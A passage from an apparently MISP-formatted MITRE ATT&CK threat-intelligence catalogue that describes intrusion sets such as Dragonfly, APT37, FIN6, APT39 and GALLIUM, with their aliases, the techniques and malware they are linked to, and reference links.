uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FLIPSIDE - S0173" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4539. Table References
Links
https://attack.mitre.org/groups/G0053
https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html
https://www.youtube.com/watch?v=fevGZs0EQu8
https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

Dragonfly - G0035

[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)

A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035"

Dragonfly - G0035 is also known as:

Dragonfly
TG-4192
Crouching Yeti
IRON LIBERTY
Energetic Bear

View relationships graph

Dragonfly - G0035 has relationships with:

similar: misp-galaxy:threat-actor="Energetic Bear" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Trojan.Karagany - S0094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"

Table 4540. Table References
Links
https://attack.mitre.org/groups/G0035
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf
https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
http://fortune.com/2017/09/06/hack-energy-grid-symantec/
https://www.dragos.com/threat/dymalloy/
https://www.secureworks.com/research/mcmd-malware-analysis
https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

APT37 - G0067

[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)

The tag is: misp-galaxy:mitre-intrusion-set="APT37 - G0067"

APT37 - G0067 is also known as:

APT37
Richochet Chollima
InkySquid
ScarCruft
Reaper
Group123
TEMP.Reaper

View relationships graph

APT37 - G0067 has relationships with:

similar: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ROKRAT - S0240" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KARAE - S0215" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POORAIM - S0216" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NavRAT - S0247" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CORALDECK - S0212" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Final1stspy - S0355" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SLOWDRIFT - S0218" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WINERACK - S0219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DOGCALL - S0213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HAPPYWORK - S0214" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BLUELIGHT - S0657" with estimative-language:likelihood-probability="almost-certain"

Table 4541. Table References
Links
https://attack.mitre.org/groups/G0067
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf
https://securelist.com/operation-daybreak/75100/
https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/
https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/
https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

FIN6 - G0037

[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-intrusion-set="FIN6 - G0037"

FIN6 - G0037 is also known as:

FIN6
Magecart Group 6
SKELETON SPIDER
ITG08

View relationships graph

FIN6 - G0037 has relationships with:

similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="LockerGoga - S0372" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="More_eggs - S0284" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Ryuk - S0446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FrameworkPOS - S0503" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Maze - S0449" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FlawedAmmyy - S0381" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GrimAgent - S0632" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4542. Table References
Links
https://attack.mitre.org/groups/G0037
https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/
https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

GCMAN - G0036

[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)

The tag is: misp-galaxy:mitre-intrusion-set="GCMAN - G0036"

GCMAN - G0036 is also known as:

GCMAN

View relationships graph

GCMAN - G0036 has relationships with:

similar: misp-galaxy:threat-actor="GCMAN" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

Table 4543. Table References
Links
https://attack.mitre.org/groups/G0036
https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

BlackOasis - G0063

[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="BlackOasis - G0063"

BlackOasis - G0063 is also known as:

BlackOasis

View relationships graph

BlackOasis - G0063 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4544. Table References
Links
https://attack.mitre.org/groups/G0063
https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
https://securelist.com/apt-trends-report-q2-2017/79332/
https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

APT39 - G0087

[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="APT39 - G0087"

APT39 - G0087 is also known as:

APT39
REMIX KITTEN
ITG07
Chafer

View relationships graph

APT39 - G0087 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Remexi - S0375" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cadelspy - S0454" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MechaFlounder - S0459" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4545. Table References
Links
https://attack.mitre.org/groups/G0087
https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html
https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets
https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf
https://home.treasury.gov/news/press-releases/sm1127
https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764

SilverTerrier - G0083

[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)

The tag is: misp-galaxy:mitre-intrusion-set="SilverTerrier - G0083"

SilverTerrier - G0083 is also known as:

SilverTerrier

View relationships graph

SilverTerrier - G0083 has relationships with:

uses: misp-galaxy:mitre-malware="NETWIRE - S0198" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DarkComet - S0334" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Agent Tesla - S0331" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Lokibot - S0447" with estimative-language:likelihood-probability="almost-certain"

Table 4546. Table References
Links
https://attack.mitre.org/groups/G0083
https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

GALLIUM - G0093

[GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="GALLIUM - G0093"

GALLIUM - G0093 is also known as:

GALLIUM
Operation Soft Cell

View relationships graph

GALLIUM - G0093 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
